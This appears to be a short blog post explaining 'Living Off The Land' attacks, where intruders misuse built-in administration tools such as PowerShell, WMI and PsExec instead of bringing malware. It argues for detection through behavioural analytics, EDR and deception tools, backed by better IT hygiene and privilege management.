Why LOTL attacks are a major concern…
Have you heard about “Living Off The Land” attacks ?
It’s usually quite hard to determine the effective and long term impact of new cyber-attacks emerging in the press. Some attacks make the buzz for a very short period of time while others do actually change the way CyberSecurity is perceived and managed in most companies. For instance, APTs (Advanced Persistent Threats) and Ransomware attacks have drastically impacted most CyberSecurity strategies over the last decade…
Well, LOTL attacks could be the right pick for the years to come…
So, what is it all about? The principle of LOTL attacks is that attackers don’t “bring” their own cyber-weapons into the victim’s Information System, but rather use what they “find” on the systems, to execute all phases of the attack. After the initial intrusion exploiting existing vulnerabilities on exposed systems, they propagate laterally, gain more priviledges, perform Denial of Service, scan for and exfiltrate data (for instance) without the need to download any malware. Instead, they use what has been “left”, installed “by default” or post-install allowed software, eg: used to monitor and check compliance of systems in production. For instance, they use PowerShell, WMI (Windows Management Instrumentation), PsExec, Mimikatz… Quite often, legitimate IT management software can also be used in a malevolent way. Usually, such attacks are fileless, avoiding generation of IoCs (indices of compromise), so that they remain fully “under the radar”. Even more scary, isn’t it?
So why are such attacks possible? Well, CyberSecurity is all about “hygiene” and proper IT management of systems. For instance, ensuring that only necessary software is installed on production systems, only necessary rights are granted to necessary users, software settings are properly set according to a validated configuration, etc. As usual: we all know what we should do, but hackers exploit our lack of discipline…
Such kind of attack seems quite advanced and hard to perform, only affordable to expert hackers… but they aren’t. Some malware are already exploiting it, such as info-stealing Astaroth as already described by Microsoft Defender Security Research Team on March 2020.
So, how may these attacks be detected or traced? This is usually done by behavioral detection systems, or deceptive CyberSecurity solutions. For sure, processes, software and even accounts used are usually legit, but they are executed in an unusual way, which makes it possible to detect and trigger the alert. Tentatively, they try to get hold over a canary file. However, detection requires either a proper modelling of the “normal” behavior of our Information Systems, efficient Artificial Intelligence (typically available through Endpoint Detection & Response software – EDR) or advanced deceptive CyberSec solutions. These are not “buzz words”, but rather highly relevant technologies to combat LOTL attacks! Of course, it also requires highly skilled SOC / CSIRT teams and Incident Response processes, on top of technology…
Nevertheless, I believe that the emergence of such successful attacks remains a real threat, as it demonstrates how hard it is to manage, control and monitor IT systems in a secure manner, avoiding to leave hazardous stuff available on those systems: you need to scan for vulnerabilities? Then install and remove the software, or disconnect the system from the network afterwards, or even protect it using Privilege Management Gateways.
Get ready for it, or the naked bad guys in the wild will indeed defeat all of your armed soldiers!
댓글